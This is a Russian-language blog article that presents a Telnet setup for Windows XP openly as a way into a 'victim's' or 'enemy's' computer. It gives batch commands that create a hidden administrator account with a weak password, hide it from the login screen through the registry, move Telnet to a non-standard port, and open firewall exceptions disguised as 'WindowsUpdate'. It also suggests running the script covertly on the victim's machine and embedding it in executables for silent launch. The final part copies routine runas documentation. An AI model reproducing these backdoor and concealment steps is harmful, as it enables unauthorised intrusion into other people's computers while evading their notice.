Настройка Telnet доступа в Windows XP

Настройка Telnet доступа в Windows XP Telnet доступ в Windows XP является самым простым, дешевым и довольно таки надёжным способом получения удалённого доступа к Windows. Бывает в жизни так, что нужно получить удалённый доступ к своему же компьютеру или же к компьютеру врага - Telnet нам поможет.

Ниже будет подробно рассказано о том как составить .BAT файл для автоматической конфигурации Telnet сервера, добавления жизненно важной группы TelnetClients, добавления новой учетной записи с правами администратора, запуска Telnet сервера и последующего удалённого подключения к нему.

Базовая конфигурация Telnet сервера

Для того чтобы организовать Telnet доступ в Windows XP, первое что нам надо сделать, так это позаботится о правильной кодировке в которой будет происходить инсталляция созданного нами .BAT файла, для русской версии операционных систем Windows это 1251 иногда это 866:

Выставляем нужную нам кодировку:

chcp 866

* ПРИМЕЧАНИЕ:
Следует взять во внимание, что если мы укажем не правильную кодировку, то мы не сможем добавить себя любимого в группу "Администраторы" так как русские символы могут превратится в крякозяблики!

Создаём пользователя "LocalDebugger" с паролем для входа "hack":

net user LocalDebugger hack /add

* ПРИМЕЧАНИЕ:
Создавать пользователя можно с какими-то системными именами, чтобы не вызывать лишних подозрений у жертвы ибо после нашего входа через Telnet, на удалённой машине будет создана папка для созданной нами учётной записи "LocalDebugger" в каталоге C:\Documents and Settings\LocalDebugger !

Добавляем созданного нами пользователя "LocalDebugger" в группу "Администраторы":

net localgroup Администраторы LocalDebugger /add

Создаём группу "TelnetClients":

net localgroup TelnetClients /add

* ПРИМЕЧАНИЕ:
Создание группы "TelnetClients" является обязательным условием потому как все пользователи (юзэр / админ) которые желают подключится к "Telnet" проверяются на их наличие в этой группе и если в этой группе нет ни одного пользователя, будь то юзэр или админ, то в доступе к Telnet серванту будет отказано для всех !

Добавляем пользователя "LocalDebugger" в группу "TelnetClients":

net localgroup TelnetClients LocalDebugger /add

Скрываем созданного нами пользователя "LocalDebugger" от "welcome screen", для этих целей создадим .reg файл следующего содержания:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ 
    CurrentVersion\Winlogon\SpecialAccounts\UserList]
"LocalDebugger"=dword:00000000

и воспользуемся командой:

regedit /s sys.reg

* ПРИМЕЧАНИЕ:
Нужно обратить внимание на то, что при создании нового админа он будет виден в welcome screen'е, отключить его можно импортировав рег файл в реестр, содержание которого изложено выше !

Итак, правами всемогущего админа мы себя наделили, созданную нами учётную с правами админа приныкали... Теперь начинаем конфигурировать Telnet сервер...

Сервис Telnet по умолчанию отключен (disabled), включаем его на авто запуск командой:

sc config tlntsvr start= auto

По умолчанию Telnet сервант настроен на обмен данными через "23 порт" - установленный по умолчанию "23-й порт" лучше сменить, ну например на "порт 972", для этого выполняем команду:

tlntadmn config port=972 sec=NTLM

Ещё рано расслабляться!!!... Есть ещё такое препятствие как брандмауэр Windows. Для того чтобы нам его обойти надо сервис "Telnet сервер" с его 972 портом добавить в исключения брандмауэра.

Разрешаем приём TCP и UDP пакетов на порт 972:

netsh firewall add portopening protocol=ALL
    port=972 name=WindowsUpdate mode=ENABLE scope=ALL

или разрешаем приём пакетов самим приложением:

netsh firewall add allowedprogram program=C:WINDOWSsystem32tlntsvr.exe
    name=WindowsUpdate mode=ENABLE scope=ALL

* ПРИМЕЧАНИЕ:
В первом примере разрешаются входящие на 972 порт по протоколам TCP и UDP... - в даном случае если жертва запустит оболочку управления брандмауэром и перейдёт на вкладку исключений то она там увидит две одинаковые записи идущие одна за другой которые в нашем случае будут иметь название "WindowsUpdate" (одна для TCP и одна для UDP протокола), что в свою очередь для более менее смышлёной жертвы может показатся подозрительным, а поэтому значение "ALL" параметра "protocol" можно сменить на "ТСР" или же воспользоваться вторым примером! Также следует взять во внимание наличие на машине жертвы других (программных или апартных) брандмауэров кроме брандмауэра Windows, обход которых требует более хитрых манипуляций и соответствующего программного обеспечения !:)

Запускаем Telnet сервер

net start telnet

На этом подготовку удалённого компьютера к удалённому его администрированию можно считать успешно завершенной :)) А чтобы облегчить себе жизнь, запихиваем все выше приведённые команды в файл с расширением .bat Содержимое бат файла у нас должно получится примерно вот такое:

 

* ПРИМЕЧАНИЕ:
после создания .bat файла нужно перекодировать его в кодировку OEM 866!

Все это дело вставляем в блокнот, и сохраняем с расширением .bat после чего запускаем этого "бат-стаса" на машине нашей жертвы с правами администратора, например с дискеты и к примеру тогда когда она (жертва) пошла по-ср... Ну, а дальше это уже дело техники :))

Проверить работоспособность выше изложенного можно и на локальной машине...

Запустите бат файл с правами администратора, а потом в командной строке, ну или в меню "Пуск/Выполнить" наберите следующее:

telnet 127.0.0.1 927

После нажатия на клавишу "Enter" Вы должны будете увидеть сообщение:

Подключение к 127.0.0.1...
Вы собираетесь передать информацию о пароле на удалённый компьютер
в зоне Интернет. Это может быть небезопасно. Послать в любом случае(y/n):

Просто жмём на клавишу "Enter" Потом мы должны будем наблюдать приглашение Telnet с просьбой ввести логин и пароль для входа:

Welcome to Microsoft Telnet Service
 
login: LocalDebugger
passwoed: hack

И если Вы всё сделали правильно и логин и пароль окажется верным, то Вы окажетесь внутри удалённого компьютера и должны будете увидеть приветствие:

=================================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
=================================================================
C:

После того как Вы окажетесь внутри поделайте, то что запланировали и быстренько назад :)) Чтобы отключится от машины жертвы, введите команду:

Чтобы завершить работу с Telnet и закрыть клиент, введите команду:

q
или
quit

.bat и .reg файлы можно вставлять в тела исполняемых файлов... При запуске таких файлов можно в скрытом режиме, тобиш без выпадения окон командной строки и всяких там сообщений, запустить на выполнение спрятанные там наши .bat и .reg файлы. О том как маскировать .bat и .reg файлы в архивных и инсталляционных пакетах поговорим отдельно в другой раз...

А под занавес обратим внимание на то, что если доступ открывается для личного пользователя то лучше конечно создавать обычного пользователя, а не администратора и потом уже из под пользователя запускать команды с правами администратора, например через команду runas

Использование runas

runas запускает конкретные средства и программы с разрешениями, отличными от тех, которые предоставляет текущая учетная запись. Синтаксис:

runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] 
    [/showtrustlevels] [/trustlevel] /user:учетная_запись_пользователя program

Параметры:

  • /profile - Загружает профиль пользователя, /profile - используется по умолчанию;
  • /no profile - Определяет, что профиль пользователя не надо загружать. Это позволяет загрузить приложение быстрее, но также может привести к сбоям в некоторых приложениях;
  • /env - Задает использование текущей сетевой среды вместо локальной среды пользователя;
  • /netonly - Показывает использование введенных сведений о пользователе только для удаленного доступа;
  • /smartcard - Определяет необходимость поддержки учетных данных с помощью смарт-карты;
  • /showtrustlevels - Выводит список параметров /trustlevel;
  • /trustlevel - Указывает уровень проверки подлинности, на котором необходимо выполнить приложение. Используйте параметр /showtrustlevels для просмотра доступных уровней доверия;
  • /user:учетная_запись_пользователя - Задает имя учетной записи пользователя, которая будет использована для запуска программы. Учетная запись пользователя должна быть представлена в формате пользователь@домен или домен\пользователь;
  • program - Задает команду или программу, которая будет запущена с помощью учетной записи, указанной в параметре /user;
  • /? - Отображает справку в командной строке.

ПРИМЕЧАНИЯ:

  • Администраторам рекомендуется использовать учетную запись с ограниченными разрешениями для выполнения повседневных задач, не связанных с администрированием, и учетную запись с более широкими правами только для выполнения отдельных административных задач. Чтобы реализовать такой подход без выхода из системы и повторного входа, войдите в систему с обычной учетной записью и используйте команду runas для запуска программ, требующих более широких прав.
  • Примеры использования команды runas см. по ссылке «»
  • Использование команды runas не ограничено административными учетными записями, хотя именно такой способ является наиболее употребительным. Любой пользователь с несколькими учетными записями может использовать runas для запуска программы, консоли MMC или компонента панели управления с другими личными данными.
  • Если необходимо использовать учетную запись администратора на своем компьютере, в качестве параметра /user: введите одно из следующих значений:
        /user:учетная_запись_администратора@имя_компьютера
    или
        /user:имя_компьютера\учетная_запись_администратора
  • Чтобы использовать данную команду в качестве администратора домена, введите одно из следующих значений параметра:
        /user:учетная_запись_администратора@имя_домена
    или
        /user:имя_домена\учетная_запись_администратора
  • С помощью команды runas можно выполнять программы (*.exe), запускать сохраненные консоли MMC (*.msc), ярлыки программ и сохраненных консолей MMC и компоненты панели управления. Их можно запускать в качестве администратора, даже если вход в систему был произведен с учетной записью члена другой группы, например группы пользователей или опытных пользователей.
  • Можно использовать команду runas для запуска любой программы, консоли MMC или компонента панели управления. Поскольку указываются соответствующие сведения об имени пользователя и его пароле, учетная запись пользователя предоставляет возможность подключения к компьютеру, а программа, консоль MMC или компонент панели управления становятся доступными в системе для учетной записи пользователя.
  • Команда runas позволяет администрировать сервер в другом лесе (компьютер, с которого запускается программа, и сервер располагаются в разных доменах).
  • При попытке запуска программы, консоли MMC или компонента контрольной панели из сети с помощью runas выполнение может окончиться неудачей, поскольку личные сведения, использованные для подключения к сетевому ресурсу, могут отличаться от тех, что использованы при запуске программы. Личные сведения, использованные при запуске программы, могут не позволить получить доступ к тому же сетевому ресурсу.
  • Некоторые компоненты, например папка «Принтеры» и элементы рабочего стола, открываются косвенно. Эти компоненты не могут быть запущены командой runas.
  • Если выполнение команды runas заканчивается неудачей, может оказаться, что служба вторичного входа не запущена или используемая учетная запись пользователя недопустима. Чтобы проверить состояние службы вторичного входа, в компоненте «Управление компьютером» щелкните узел Службы и приложения, а затем — Службы. Чтобы проверить учетную запись пользователя, попытайтесь подключиться к соответствующему домену с помощью этой учетной записи.

Примеры:

Чтобы в качестве администратора на локальном компьютере запустить экземпляр интерпретатора командной строки, введите команду:

runas /user:имя_локального_компьютера\administrator cmd

После запроса введите пароль администратора. Чтобы запустить экземпляр оснастки «Управление компьютером», используя учетную запись администратора домена companydomain\domainadmin, введите команду:

runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc"

После запроса введите пароль соответствующей учетной записи. Чтобы запустить экземпляр окна командной строки, сохраненную консоль MMC, компонент панели управления или программу, которая будет администрировать сервер в другом лесе, введите команду:

runas /netonly /user:домен\имя_пользователя "команда"

В параметре домен\имя_пользователя должен быть указан пользователь с разрешениями, достаточными для администрирования сервера. После запроса введите пароль соответствующей учетной записи.

Автор: Олег Головский

Об авторе
АдМинь БагоИскатель
АдМинь БагоИскатель ярый борец за безглючную работу любых механизмов и организмов во всей вселенной и потому пребывает в вечном поиске всяческих багов, а тот кто ищет как известно всегда находит. Когда что-то или кого-то вылечить не в состоянии, то со словами "Я в аду, а вы все черти" уходит в запой выйдя из которого снова берётся лечить неизлечимое.
Ещё статьи автора

Комментарии   

артем
0 #1 артем 12.07.2015 21:48
Здраствуйте я не пойму как на windows 8 вступить в группу
Цитировать

Добавить комментарий


Защитный код
Обновить

no-script
[ Подробнее... ]
27 megabytes